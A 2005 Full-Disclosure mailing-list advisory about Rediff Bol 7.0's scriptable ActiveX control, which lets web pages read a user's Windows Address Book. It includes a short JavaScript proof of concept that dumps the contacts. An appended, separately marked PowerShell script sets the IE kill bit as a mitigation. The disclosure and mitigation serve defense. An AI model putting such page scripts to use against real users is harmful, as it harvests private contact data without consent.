[Full-disclosure] Rediff Bol 7.0 WAB Contacts

From: Gregory R. Panakkal (viper31337_at_yahoo.co.in)
Date: 09/04/05

  • Next message: Chuck Fullerton: "RE: [Full-disclosure] RE: Computer forensics to uncover illegalinternet use"

    Date: Sun, 4 Sep 2005 08:57:39 +0100 (BST)
    To: full-disclosure@lists.grok.org.uk

    Rediff Bol 7.0 WAB Contacts
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Affected Program : Rediff Bol 7.0
    It is a popular instant messenger from Rediff.com

    Related URL : http://messenger.rediff.com/newbol/

    Discovered by : Gregory R. Panakkal

    Vulnerability Description :

    Rediff Bol's ActiveX control (Fetch.FetchContact.1 / Fetch.dll) allows a
    webpage to read the user's Windows Address Book (WAB) contacts. The method
    "FullAddressBook" returns the WAB contact list in XML format.

    Proof Of Concept:

    [script]
    // Instantiate Rediff Bol's control by ProgID; any page viewed in IE can do this
    var Obj = new ActiveXObject("Fetch.FetchContact.1");
    // Dump the user's WAB contacts (returned as XML) in a message box
    alert(Obj.FullAddressBook(0,"","",""));
    [/script]

    Online Demo:
    http://www.infogreg.com/security/im/rediff-bol-7-exposes-wab.html

    rgds,
    Gregory R. Panakkal
    http://www.infogreg.com/

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
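
The advisory names the control only by its ProgID and gives no vendor fix. The standard workaround for a scriptable ActiveX control that exposes local data to web pages is to set the Internet Explorer "kill bit" for its CLSID (Compatibility Flags = 0x400 under the ActiveX Compatibility key, per Microsoft KB 240797), which stops IE from instantiating it regardless of zone settings. The following PowerShell script is an added example, not part of the advisory or of Rediff's software: it resolves the ProgID Fetch.FetchContact.1 to its CLSID through the registry rather than hard-coding a GUID (the CLSID is not stated anywhere in the advisory), then sets the kill bit. It assumes the control is registered on the machine and that the shell is elevated.

```powershell
# Added example: kill-bit the ActiveX control named in the advisory.
# Assumptions: ProgID Fetch.FetchContact.1 is registered under HKCR on this
# machine (the CLSID is resolved from it, not hard-coded) and the script runs
# from an elevated PowerShell prompt.
param(
    [string]$ProgId = 'Fetch.FetchContact.1'
)

# Resolve ProgID -> CLSID. HKCR\<ProgID>\CLSID stores the GUID as its default value.
$progIdKey = "Registry::HKEY_CLASSES_ROOT\$ProgId\CLSID"
if (-not (Test-Path -Path $progIdKey)) {
    Write-Warning "ProgID '$ProgId' is not registered on this machine; nothing to do."
    return
}
$clsid = (Get-Item -Path $progIdKey).GetValue('')
if ($clsid -notmatch '^\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$') {
    throw "Unexpected CLSID value '$clsid' under $progIdKey"
}
Write-Output "ProgID $ProgId resolves to CLSID $clsid"

# Kill-bit locations. On 64-bit Windows a 32-bit control is also looked up
# under Wow6432Node, so write to every base key that exists on this machine.
$compatKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
) | Where-Object { Test-Path -Path $_ }

foreach ($base in $compatKeys) {
    $key = Join-Path -Path $base -ChildPath $clsid
    if (-not (Test-Path -Path $key)) {
        New-Item -Path $key -Force | Out-Null
    }
    # 0x400 is the kill bit; OR it into any flags already present rather than
    # overwriting them.
    $current = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                    -ErrorAction SilentlyContinue).'Compatibility Flags'
    $new = [int]($current -bor 0x400)
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $new -Type DWord

    # Read back and confirm the bit is really set.
    $check = (Get-ItemProperty -Path $key -Name 'Compatibility Flags').'Compatibility Flags'
    if (($check -band 0x400) -eq 0) {
        throw "Failed to set kill bit under $key"
    }
    Write-Output ("Kill bit set under {0} (Compatibility Flags = 0x{1:X})" -f $key, $check)
}
```

After running it, reloading the proof-of-concept page in IE should fail at `new ActiveXObject("Fetch.FetchContact.1")` with "Automation server can't create object", while the messenger itself, which does not go through IE's ActiveX compatibility check, keeps working. The kill bit only covers instantiation from IE and other hosts that honour the ActiveX Compatibility key; it does not unregister the control, so a later Rediff Bol update that ships a control with a different CLSID would need the same treatment.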